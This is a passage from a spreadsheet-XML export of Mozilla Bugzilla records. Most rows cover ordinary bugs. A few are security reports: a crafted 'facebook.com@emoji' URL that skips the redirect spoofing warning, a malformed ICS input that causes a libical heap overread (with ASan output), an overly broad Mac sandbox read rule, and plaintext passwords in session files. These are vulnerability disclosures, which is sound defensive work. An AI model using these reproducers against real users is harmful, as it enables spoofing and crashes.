          <t>FIXED</t>
        </is>
      </c>
      <c r="P2019" t="inlineStr"/>
      <c r="Q2019" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R2019" t="inlineStr">
        <is>
          <t>blocker</t>
        </is>
      </c>
      <c r="S2019" t="inlineStr">
        <is>
          <t>3.11</t>
        </is>
      </c>
      <c r="T2019" t="n">
        <v>1</v>
      </c>
      <c r="U2019" t="n">
        <v>0</v>
      </c>
      <c r="V2019" t="n">
        <v>14</v>
      </c>
      <c r="W2019" t="inlineStr">
        <is>
          <t>crmftest is core dumping on HP-UX. This failure first appeared
20050930.
crmftest -d ../bobdir -p Bob -e dave@bogus.com -s TestCA -P nss crmf decode
all.sh[100]: 26945 Memory fault(coredump)
(gdb) thread
[Current thread is 1 (system thread 3647440)]
(gdb) backtrace
#0  0xc01cd9ac in __regcomp10_std+0x1e0c () from /usr/lib/libc.2
#1  0x6f7a696c in ?? ()
#2  0xc2cd9140 in SECITEM_CopyItem (arena=Cannot access memory at address 0x312e30cd
) at secitem.c:240
Cannot access memory at address 0x312e30dd</t>
        </is>
      </c>
      <c r="X2019" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="2020">
      <c r="A2020" t="n">
        <v>563360</v>
      </c>
      <c r="B2020" t="inlineStr">
        <is>
          <t>2010-05-03 09:33:49 -0700</t>
        </is>
      </c>
      <c r="C2020" t="inlineStr">
        <is>
          <t>Update Secret Phrase is broken</t>
        </is>
      </c>
      <c r="D2020" t="inlineStr">
        <is>
          <t>2018-09-24 14:26:41 -0700</t>
        </is>
      </c>
      <c r="E2020" t="n">
        <v>1</v>
      </c>
      <c r="F2020" t="n">
        <v>1</v>
      </c>
      <c r="G2020" t="n">
        <v>2</v>
      </c>
      <c r="H2020" t="inlineStr">
        <is>
          <t>Client Software</t>
        </is>
      </c>
      <c r="I2020" t="inlineStr">
        <is>
          <t>Firefox</t>
        </is>
      </c>
      <c r="J2020" t="inlineStr">
        <is>
          <t>Sync</t>
        </is>
      </c>
      <c r="K2020" t="inlineStr">
        <is>
          <t>unspecified</t>
        </is>
      </c>
      <c r="L2020" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M2020" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N2020" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O2020" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P2020" t="inlineStr">
        <is>
          <t>[weave1.3]</t>
        </is>
      </c>
      <c r="Q2020" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R2020" t="inlineStr">
        <is>
          <t>major</t>
        </is>
      </c>
      <c r="S2020" t="inlineStr">
        <is>
          <t>1.3b4</t>
        </is>
      </c>
      <c r="T2020" t="n">
        <v>1</v>
      </c>
      <c r="U2020" t="n">
        <v>0</v>
      </c>
      <c r="V2020" t="n">
        <v>6</v>
      </c>
      <c r="W2020" t="inlineStr">
        <is>
          <t>Seen on Weave 1.3b3
STR:
0) assumes you have at least two clients running from the same account
1) On Client A,  Change the Secret Phrase. Allow it to upload the change.
2) On Client B, sync.
3) sync will no work, and and [!] icon appears in the status bar.  Click it then click the button to access the Sync Preferences
4) Notice the warning for incorrect phrase and two links (update and reset)
5) Click the update link and enter the secret phrase you changed to in step 1.
Tested results:
The dialog never activates the button to allow you to change the phrase.
Work around is to use the reset link and change to the phrase in step one.
Expected result:
the update secret phrase dialog should allow you to change the phrase locally to match the server.</t>
        </is>
      </c>
      <c r="X2020" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="2021">
      <c r="A2021" t="n">
        <v>1579914</v>
      </c>
      <c r="B2021" t="inlineStr">
        <is>
          <t>2019-09-09 09:57:57 -0700</t>
        </is>
      </c>
      <c r="C2021" t="inlineStr">
        <is>
          <t>[Experiment] Pref-Flip: activity-stream-bigsnippet-holdback-release69-1577614 V2 Fx 69.0 Release</t>
        </is>
      </c>
      <c r="D2021" t="inlineStr">
        <is>
          <t>2019-10-29 09:30:05 -0700</t>
        </is>
      </c>
      <c r="E2021" t="n">
        <v>1</v>
      </c>
      <c r="F2021" t="n">
        <v>1</v>
      </c>
      <c r="G2021" t="n">
        <v>5</v>
      </c>
      <c r="H2021" t="inlineStr">
        <is>
          <t>Other</t>
        </is>
      </c>
      <c r="I2021" t="inlineStr">
        <is>
          <t>Shield</t>
        </is>
      </c>
      <c r="J2021" t="inlineStr">
        <is>
          <t>Shield Study</t>
        </is>
      </c>
      <c r="K2021" t="inlineStr">
        <is>
          <t>unspecified</t>
        </is>
      </c>
      <c r="L2021" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="M2021" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="N2021" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O2021" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P2021" t="inlineStr"/>
      <c r="Q2021" t="inlineStr">
        <is>
          <t>P3</t>
        </is>
      </c>
      <c r="R2021" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S2021" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="T2021" t="n">
        <v>1</v>
      </c>
      <c r="U2021" t="n">
        <v>0</v>
      </c>
      <c r="V2021" t="n">
        <v>2</v>
      </c>
      <c r="W2021" t="inlineStr">
        <is>
          <t>activity-stream-bigsnippet-holdback-release69-1577614 V2
Launch a holdback study to understand search/revenue impact of a new, new tab snippet that is positioned directly under the new tab search bar.
The relationships team has conceived of a dynamic new snippet AKA the "Giant Snippet" (screenshot attached, though with placeholder copy and logo). The old snippet is far down on the page. This one is above the fold. Prior testing suggests this will be far more successful at getting users to engage more deeply with Firefox and adjacent services.
There is business urgency to launch this Giant Snippet in 69 to maximize the time to gain FxA MAU (relationships KPI) towards our Moco 2019 goal, therefore we are going out live with this to all users.
Experimenter is the source of truth for details and delivery. Changes to Bugzilla are not reflected in Experimenter and will not change delivery configuration.
More information: https://experimenter.services.mozilla.com/experiments/activity-stream-bigsnippet-holdback-release69-1577614-v2/</t>
        </is>
      </c>
      <c r="X2021" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="2022">
      <c r="A2022" t="n">
        <v>615333</v>
      </c>
      <c r="B2022" t="inlineStr">
        <is>
          <t>2010-11-29 14:01:13 -0800</t>
        </is>
      </c>
      <c r="C2022" t="inlineStr">
        <is>
          <t>Two more talos runs places:9d659e8d218d</t>
        </is>
      </c>
      <c r="D2022" t="inlineStr">
        <is>
          <t>2013-08-12 21:54:08 -0700</t>
        </is>
      </c>
      <c r="E2022" t="n">
        <v>1</v>
      </c>
      <c r="F2022" t="n">
        <v>1</v>
      </c>
      <c r="G2022" t="n">
        <v>5</v>
      </c>
      <c r="H2022" t="inlineStr">
        <is>
          <t>Other</t>
        </is>
      </c>
      <c r="I2022" t="inlineStr">
        <is>
          <t>Release Engineering</t>
        </is>
      </c>
      <c r="J2022" t="inlineStr">
        <is>
          <t>General</t>
        </is>
      </c>
      <c r="K2022" t="inlineStr">
        <is>
          <t>other</t>
        </is>
      </c>
      <c r="L2022" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M2022" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N2022" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O2022" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P2022" t="inlineStr"/>
      <c r="Q2022" t="inlineStr">
        <is>
          <t>P2</t>
        </is>
      </c>
      <c r="R2022" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S2022" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="T2022" t="n">
        <v>1</v>
      </c>
      <c r="U2022" t="n">
        <v>0</v>
      </c>
      <c r="V2022" t="n">
        <v>2</v>
      </c>
      <c r="W2022" t="inlineStr">
        <is>
          <t>I need two more talos runs on this changeset:
http://hg.mozilla.org/projects/places/rev/9d659e8d218d
For all platforms for these suites:
chrome
nochrome
dirty
tp4
cold</t>
        </is>
      </c>
      <c r="X2022" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="2023">
      <c r="A2023" t="n">
        <v>1322716</v>
      </c>
      <c r="B2023" t="inlineStr">
        <is>
          <t>2016-12-09 11:43:49 -0800</t>
        </is>
      </c>
      <c r="C2023" t="inlineStr">
        <is>
          <t>Overly inclusive regex used in Mac GMP sandbox profile exposes users' data to GMP processes</t>
        </is>
      </c>
      <c r="D2023" t="inlineStr">
        <is>
          <t>2017-10-26 19:06:26 -0700</t>
        </is>
      </c>
      <c r="E2023" t="n">
        <v>1</v>
      </c>
      <c r="F2023" t="n">
        <v>1</v>
      </c>
      <c r="G2023" t="n">
        <v>3</v>
      </c>
      <c r="H2023" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I2023" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J2023" t="inlineStr">
        <is>
          <t>Security: Process Sandboxing</t>
        </is>
      </c>
      <c r="K2023" t="inlineStr">
        <is>
          <t>53 Branch</t>
        </is>
      </c>
      <c r="L2023" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="M2023" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="N2023" t="inlineStr">
        <is>
          <t>VERIFIED</t>
        </is>
      </c>
      <c r="O2023" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P2023" t="inlineStr">
        <is>
          <t>[post-critsmash-triage][adv-main52+] sb+</t>
        </is>
      </c>
      <c r="Q2023" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R2023" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S2023" t="inlineStr">
        <is>
          <t>mozilla53</t>
        </is>
      </c>
      <c r="T2023" t="n">
        <v>1</v>
      </c>
      <c r="U2023" t="n">
        <v>0</v>
      </c>
      <c r="V2023" t="n">
        <v>16</v>
      </c>
      <c r="W2023" t="inlineStr">
        <is>
          <t>The GMP sandbox profile includes the following regex to allow access to files in /private/var.
From security/sandbox/mac/Sandbox.mm,
   135   "(allow file-read*\n"
   ...
   138   "    (regex #\"^/(private/)?var($|/)\")\n"
It's unlikely we need to allow read access to the entire /private/var directory tree which contains sensitive state from programs that use /private/var to store data. One example of private information being stored here is images received by text message through the OS X Messages app:
  /private/var/folders/.../com.apple.iChat/Messages/Images/&lt;UUID&gt;.jpg
The GMP process shouldn't be able to read personal pictures.
On OS X, the value of $TMPDIR is /var/folders/... where /var is a symlink to /private/var so the regex includes $TMPDIR which may be widely used. We should try to limit the regex to only include subdirectories we need.
Impact on the current _content_ sandbox is TBD. The content sandbox does allow access to some files in /private/var using regex that are much more constrained. I'd like to do another audit focusing on /private/var to confirm how much we allow.  Here's a list of files paths that I previously generated.
https://wiki.mozilla.org/Sandbox/OS_X_Rule_Set#How_security.sandbox.content.level_Affects_File_Access</t>
        </is>
      </c>
      <c r="X2023" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="2024">
      <c r="A2024" t="n">
        <v>1603308</v>
      </c>
      <c r="B2024" t="inlineStr">
        <is>
          <t>2019-12-11 18:02:43 -0800</t>
        </is>
      </c>
      <c r="C2024" t="inlineStr">
        <is>
          <t>fix verifyprocessed to check elasticsearch and fix cronrun to stop being sad</t>
        </is>
      </c>
      <c r="D2024" t="inlineStr">
        <is>
          <t>2019-12-16 08:00:50 -0800</t>
        </is>
      </c>
      <c r="E2024" t="n">
        <v>1</v>
      </c>
      <c r="F2024" t="n">
        <v>1</v>
      </c>
      <c r="G2024" t="n">
        <v>4</v>
      </c>
      <c r="H2024" t="inlineStr">
        <is>
          <t>Server Software</t>
        </is>
      </c>
      <c r="I2024" t="inlineStr">
        <is>
          <t>Socorro</t>
        </is>
      </c>
      <c r="J2024" t="inlineStr">
        <is>
          <t>General</t>
        </is>
      </c>
      <c r="K2024" t="inlineStr">
        <is>
          <t>unspecified</t>
        </is>
      </c>
      <c r="L2024" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="M2024" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="N2024" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O2024" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P2024" t="inlineStr"/>
      <c r="Q2024" t="inlineStr">
        <is>
          <t>P2</t>
        </is>
      </c>
      <c r="R2024" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S2024" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="T2024" t="n">
        <v>1</v>
      </c>
      <c r="U2024" t="n">
        <v>0</v>
      </c>
      <c r="V2024" t="n">
        <v>18</v>
      </c>
      <c r="W2024" t="inlineStr">
        <is>
          <t>We have a verifyprocessed command that runs every morning, checks all the raw crash reports for the previous day and makes sure we have a corresponding processed crash. We should improve it to also check Elasticsearch to make sure the processed crash is there, too, and if not, treat that as a missing processed crash.
This bug covers that.</t>
        </is>
      </c>
      <c r="X2024" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="2025">
      <c r="A2025" t="n">
        <v>1683536</v>
      </c>
      <c r="B2025" t="inlineStr">
        <is>
          <t>2020-12-20 03:12:41 -0800</t>
        </is>
      </c>
      <c r="C2025" t="inlineStr">
        <is>
          <t>Bypassing http auth spoofing warning prompt when there's a cached redirect</t>
        </is>
      </c>
      <c r="D2025" t="inlineStr">
        <is>
          <t>2024-05-30 10:25:08 -0700</t>
        </is>
      </c>
      <c r="E2025" t="n">
        <v>1</v>
      </c>
      <c r="F2025" t="n">
        <v>1</v>
      </c>
      <c r="G2025" t="n">
        <v>3</v>
      </c>
      <c r="H2025" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I2025" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J2025" t="inlineStr">
        <is>
          <t>Networking</t>
        </is>
      </c>
      <c r="K2025" t="inlineStr">
        <is>
          <t>unspecified</t>
        </is>
      </c>
      <c r="L2025" t="inlineStr">
        <is>
          <t>Desktop</t>
        </is>
      </c>
      <c r="M2025" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N2025" t="inlineStr">
        <is>
          <t>VERIFIED</t>
        </is>
      </c>
      <c r="O2025" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P2025" t="inlineStr">
        <is>
          <t>[reporter-external] [client-bounty-form] [verif?][necko-triaged][post-critsmash-triage][adv-main86+]</t>
        </is>
      </c>
      <c r="Q2025" t="inlineStr">
        <is>
          <t>P2</t>
        </is>
      </c>
      <c r="R2025" t="inlineStr">
        <is>
          <t>S3</t>
        </is>
      </c>
      <c r="S2025" t="inlineStr">
        <is>
          <t>86 Branch</t>
        </is>
      </c>
      <c r="T2025" t="n">
        <v>1</v>
      </c>
      <c r="U2025" t="n">
        <v>0</v>
      </c>
      <c r="V2025" t="n">
        <v>16</v>
      </c>
      <c r="W2025" t="inlineStr">
        <is>
          <t>As firefox browser nightly have open redirect prevention whereby the warning prompt will be shown to user in case of malicious attempt of making redirect with help of "@" eg. if you open www.facebook.com@go.com 
It will show warning prompt to prevent any spoofing.
However this could be bypass with emoji.
eg. if user click on below url , it won't be prompted for redirect warning &amp; adversary could use the bug to exploit issue.
https://www.facebook.com@☺️.com
it will redirect to adversary page without any redirect prompt</t>
        </is>
      </c>
      <c r="X2025" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="2026">
      <c r="A2026" t="n">
        <v>1280832</v>
      </c>
      <c r="B2026" t="inlineStr">
        <is>
          <t>2016-06-19 16:39:29 -0700</t>
        </is>
      </c>
      <c r="C2026" t="inlineStr">
        <is>
          <t>Heap buffer overread in libical (icalparser_parse_string function)</t>
        </is>
      </c>
      <c r="D2026" t="inlineStr">
        <is>
          <t>2024-05-30 09:18:31 -0700</t>
        </is>
      </c>
      <c r="E2026" t="n">
        <v>1</v>
      </c>
      <c r="F2026" t="n">
        <v>1</v>
      </c>
      <c r="G2026" t="n">
        <v>2</v>
      </c>
      <c r="H2026" t="inlineStr">
        <is>
          <t>Client Software</t>
        </is>
      </c>
      <c r="I2026" t="inlineStr">
        <is>
          <t>Calendar</t>
        </is>
      </c>
      <c r="J2026" t="inlineStr">
        <is>
          <t>Internal Components</t>
        </is>
      </c>
      <c r="K2026" t="inlineStr">
        <is>
          <t>unspecified</t>
        </is>
      </c>
      <c r="L2026" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="M2026" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="N2026" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O2026" t="inlineStr">
        <is>
          <t>DUPLICATE</t>
        </is>
      </c>
      <c r="P2026" t="inlineStr"/>
      <c r="Q2026" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R2026" t="inlineStr">
        <is>
          <t>critical</t>
        </is>
      </c>
      <c r="S2026" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="T2026" t="n">
        <v>1</v>
      </c>
      <c r="U2026" t="n">
        <v>0</v>
      </c>
      <c r="V2026" t="n">
        <v>31</v>
      </c>
      <c r="W2026" t="inlineStr">
        <is>
          <t>User Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_5) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.103 Safari/537.36
Steps to reproduce:
The following ICS file causes a heap overread in libical 0.47 in the icalparser_parse_string function. I wrote a small program simply calling the function to parse a given input for testing.
BEGIN;
TZNAME:\
TZNAME:\
TZNAME:\
TZNAME:\
TZNAME:\
TZNAME:\
TZNAME:\
TZNAME:\
Unfortunately, I have not been able to build a version of Thunderbird yet with ASan, which I would be able to use to get a better idea of what exactly could be affected. Valgrind doesn't much care about these as far as I can tell and doesn't report them.
Actual results:
The ASan results:
=================================================================
==19470==ERROR: AddressSanitizer: heap-buffer-overflow on address 0x60200000ef92 at pc 0x000000511d4f bp 0x7ffd2839ded0 sp 0x7ffd2839dec8
READ of size 1 at 0x60200000ef92 thread T0
    #0 0x511d4e in icalmemory_strdup_and_dequote (/root/tmp/new_parse/parse_string047_asan+0x511d4e)
    #1 0x50f5b3 in icalvalue_new_from_string_with_error (/root/tmp/new_parse/parse_string047_asan+0x50f5b3)
    #2 0x512f76 in icalvalue_new_from_string (/root/tmp/new_parse/parse_string047_asan+0x512f76)
    #3 0x4f4773 in icalparser_add_line (/root/tmp/new_parse/parse_string047_asan+0x4f4773)
    #4 0x4efabe in icalparser_parse (/root/tmp/new_parse/parse_string047_asan+0x4efabe)
    #5 0x4f9c1f in icalparser_parse_string (/root/tmp/new_parse/parse_string047_asan+0x4f9c1f)
    #6 0x4eb7ef in main (/root/tmp/new_parse/parse_string047_asan+0x4eb7ef)
    #7 0x7f68086cba3f in __libc_start_main /build/glibc-ryFjv0/glibc-2.21/csu/libc-start.c:289
    #8 0x444ae8 in _start (/root/tmp/new_parse/parse_string047_asan+0x444ae8)
0x60200000ef92 is located 0 bytes to the right of 2-byte region [0x60200000ef90,0x60200000ef92)
allocated by thread T0 here:
    #0 0x4cbab2 in malloc (/root/tmp/new_parse/parse_string047_asan+0x4cbab2)
    #1 0x5c443d in icalmemory_new_buffer (/root/tmp/new_parse/parse_string047_asan+0x5c443d)
    #2 0x4ed798 in make_segment (/root/tmp/new_parse/parse_string047_asan+0x4ed798)
    #3 0x4ed417 in icalparser_get_value (/root/tmp/new_parse/parse_string047_asan+0x4ed417)
    #4 0x4f43c4 in icalparser_add_line (/root/tmp/new_parse/parse_string047_asan+0x4f43c4)
    #5 0x4efabe in icalparser_parse (/root/tmp/new_parse/parse_string047_asan+0x4efabe)
    #6 0x4f9c1f in icalparser_parse_string (/root/tmp/new_parse/parse_string047_asan+0x4f9c1f)
    #7 0x4eb7ef in main (/root/tmp/new_parse/parse_string047_asan+0x4eb7ef)
    #8 0x7f68086cba3f in __libc_start_main /build/glibc-ryFjv0/glibc-2.21/csu/libc-start.c:289
SUMMARY: AddressSanitizer: heap-buffer-overflow ??:0 icalmemory_strdup_and_dequote
Shadow bytes around the buggy address:
  0x0c047fff9da0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
  0x0c047fff9db0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
  0x0c047fff9dc0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
  0x0c047fff9dd0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
  0x0c047fff9de0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa 02 fa
=&gt;0x0c047fff9df0: fa fa[02]fa fa fa fd fa fa fa 04 fa fa fa fd fa
  0x0c047fff9e00: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
  0x0c047fff9e10: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
  0x0c047fff9e20: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
  0x0c047fff9e30: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
  0x0c047fff9e4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9470==ABORTING
Expected results:
Not crashed.</t>
        </is>
      </c>
      <c r="X2026" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="2027">
      <c r="A2027" t="n">
        <v>853657</v>
      </c>
      <c r="B2027" t="inlineStr">
        <is>
          <t>2013-03-21 15:36:05 -0700</t>
        </is>
      </c>
      <c r="C2027" t="inlineStr">
        <is>
          <t>Videos don't fit the layout on mobile</t>
        </is>
      </c>
      <c r="D2027" t="inlineStr">
        <is>
          <t>2013-04-04 10:08:43 -0700</t>
        </is>
      </c>
      <c r="E2027" t="n">
        <v>1</v>
      </c>
      <c r="F2027" t="n">
        <v>1</v>
      </c>
      <c r="G2027" t="n">
        <v>5</v>
      </c>
      <c r="H2027" t="inlineStr">
        <is>
          <t>Other</t>
        </is>
      </c>
      <c r="I2027" t="inlineStr">
        <is>
          <t>support.mozilla.org</t>
        </is>
      </c>
      <c r="J2027" t="inlineStr">
        <is>
          <t>Knowledge Base Software</t>
        </is>
      </c>
      <c r="K2027" t="inlineStr">
        <is>
          <t>unspecified</t>
        </is>
      </c>
      <c r="L2027" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M2027" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N2027" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O2027" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P2027" t="inlineStr">
        <is>
          <t>u=user c=wiki p=0 s=2013.7</t>
        </is>
      </c>
      <c r="Q2027" t="inlineStr">
        <is>
          <t>P2</t>
        </is>
      </c>
      <c r="R2027" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S2027" t="inlineStr">
        <is>
          <t>2013Q2</t>
        </is>
      </c>
      <c r="T2027" t="n">
        <v>1</v>
      </c>
      <c r="U2027" t="n">
        <v>0</v>
      </c>
      <c r="V2027" t="n">
        <v>6</v>
      </c>
      <c r="W2027" t="inlineStr">
        <is>
          <t>The youtube video embedd is too big fit the narrow column in our mobile view. It should scale to be just as narrow.</t>
        </is>
      </c>
      <c r="X2027" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="2028">
      <c r="A2028" t="n">
        <v>1336055</v>
      </c>
      <c r="B2028" t="inlineStr">
        <is>
          <t>2017-02-02 03:01:46 -0800</t>
        </is>
      </c>
      <c r="C2028" t="inlineStr">
        <is>
          <t>Migrate all test packages to Swift 3</t>
        </is>
      </c>
      <c r="D2028" t="inlineStr">
        <is>
          <t>2017-02-06 03:44:12 -0800</t>
        </is>
      </c>
      <c r="E2028" t="n">
        <v>1</v>
      </c>
      <c r="F2028" t="n">
        <v>1</v>
      </c>
      <c r="G2028" t="n">
        <v>2</v>
      </c>
      <c r="H2028" t="inlineStr">
        <is>
          <t>Client Software</t>
        </is>
      </c>
      <c r="I2028" t="inlineStr">
        <is>
          <t>Firefox for iOS</t>
        </is>
      </c>
      <c r="J2028" t="inlineStr">
        <is>
          <t>Build &amp; Test</t>
        </is>
      </c>
      <c r="K2028" t="inlineStr">
        <is>
          <t>unspecified</t>
        </is>
      </c>
      <c r="L2028" t="inlineStr">
        <is>
          <t>Other</t>
        </is>
      </c>
      <c r="M2028" t="inlineStr">
        <is>
          <t>iOS</t>
        </is>
      </c>
      <c r="N2028" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O2028" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P2028" t="inlineStr">
        <is>
          <t>[MobileCore] [Debt]</t>
        </is>
      </c>
      <c r="Q2028" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R2028" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S2028" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="T2028" t="n">
        <v>1</v>
      </c>
      <c r="U2028" t="n">
        <v>0</v>
      </c>
      <c r="V2028" t="n">
        <v>1</v>
      </c>
      <c r="W2028" t="inlineStr">
        <is>
          <t>We were unable to migrate the test packages as we went along due to test host dependencies. We need to do this after all other packages have been migrated</t>
        </is>
      </c>
      <c r="X2028" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="2029">
      <c r="A2029" t="n">
        <v>1280294</v>
      </c>
      <c r="B2029" t="inlineStr">
        <is>
          <t>2016-06-15 10:02:36 -0700</t>
        </is>
      </c>
      <c r="C2029" t="inlineStr">
        <is>
          <t>Session Manager can sometimes store Firefox Accounts Password in plain text</t>
        </is>
      </c>
      <c r="D2029" t="inlineStr">
        <is>
          <t>2017-11-08 17:03:51 -0800</t>
        </is>
      </c>
      <c r="E2029" t="n">
        <v>1</v>
      </c>
      <c r="F2029" t="n">
        <v>1</v>
      </c>
      <c r="G2029" t="n">
        <v>2</v>
      </c>
      <c r="H2029" t="inlineStr">
        <is>
          <t>Client Software</t>
        </is>
      </c>
      <c r="I2029" t="inlineStr">
        <is>
          <t>Firefox</t>
        </is>
      </c>
      <c r="J2029" t="inlineStr">
        <is>
          <t>Session Restore</t>
        </is>
      </c>
      <c r="K2029" t="inlineStr">
        <is>
          <t>Trunk</t>
        </is>
      </c>
      <c r="L2029" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="M2029" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="N2029" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O2029" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P2029" t="inlineStr">
        <is>
          <t>[adv-main48+]</t>
        </is>
      </c>
      <c r="Q2029" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R2029" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S2029" t="inlineStr">
        <is>
          <t>Firefox 50</t>
        </is>
      </c>
      <c r="T2029" t="n">
        <v>1</v>
      </c>
      <c r="U2029" t="n">
        <v>0</v>
      </c>
      <c r="V2029" t="n">
        <v>60</v>
      </c>
      <c r="W2029" t="inlineStr">
        <is>
          <t>We received a report from a partner that showed a sessionstore.js with their password in plain text.
On further investigation, we noticed that it was a case where the particular page (In this case, Firefox accounts) provided the ability to show the password and when this was done, because the field was now just a text field, the password was written to sessionstore.js.
We should probably be smarter in this case and somehow maintain that the field was a password field at some point in time so that we don't ever save the password for that field to disk.</t>
        </is>
      </c>
      <c r="X2029" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="2030">
      <c r="A2030" t="n">
        <v>1596430</v>
      </c>
      <c r="B2030" t="inlineStr">
        <is>
          <t>2019-11-14 07:22:08 -0800</t>
        </is>
      </c>
      <c r="C2030" t="inlineStr">
        <is>
          <t>browser/base/content/test/performance/browser_startup_mainthreadio.js | stat on ... cert9.db-journal 1 more times than expected before handling user events -</t>
        </is>
      </c>
      <c r="D2030" t="inlineStr">
        <is>
          <t>2022-01-10 05:52:25 -0800</t>
        </is>
      </c>
      <c r="E2030" t="n">
        <v>1</v>
      </c>
      <c r="F2030" t="n">
        <v>1</v>
      </c>
      <c r="G2030" t="n">
        <v>3</v>
      </c>
      <c r="H2030" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I2030" t="inlineStr">
        <is>
          <t>NSS</t>
        </is>
      </c>
      <c r="J2030" t="inlineStr">
        <is>
          <t>Libraries</t>
        </is>
      </c>
      <c r="K2030" t="inlineStr">
        <is>
          <t>trunk</t>
        </is>
      </c>
      <c r="L2030" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="M2030" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="N2030" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O2030" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P2030" t="inlineStr"/>
      <c r="Q2030" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R2030" t="inlineStr">
        <is>
          <t>blocker</t>
        </is>
      </c>
      <c r="S2030" t="inlineStr">
        <is>
          <t>---</t>
        </is>
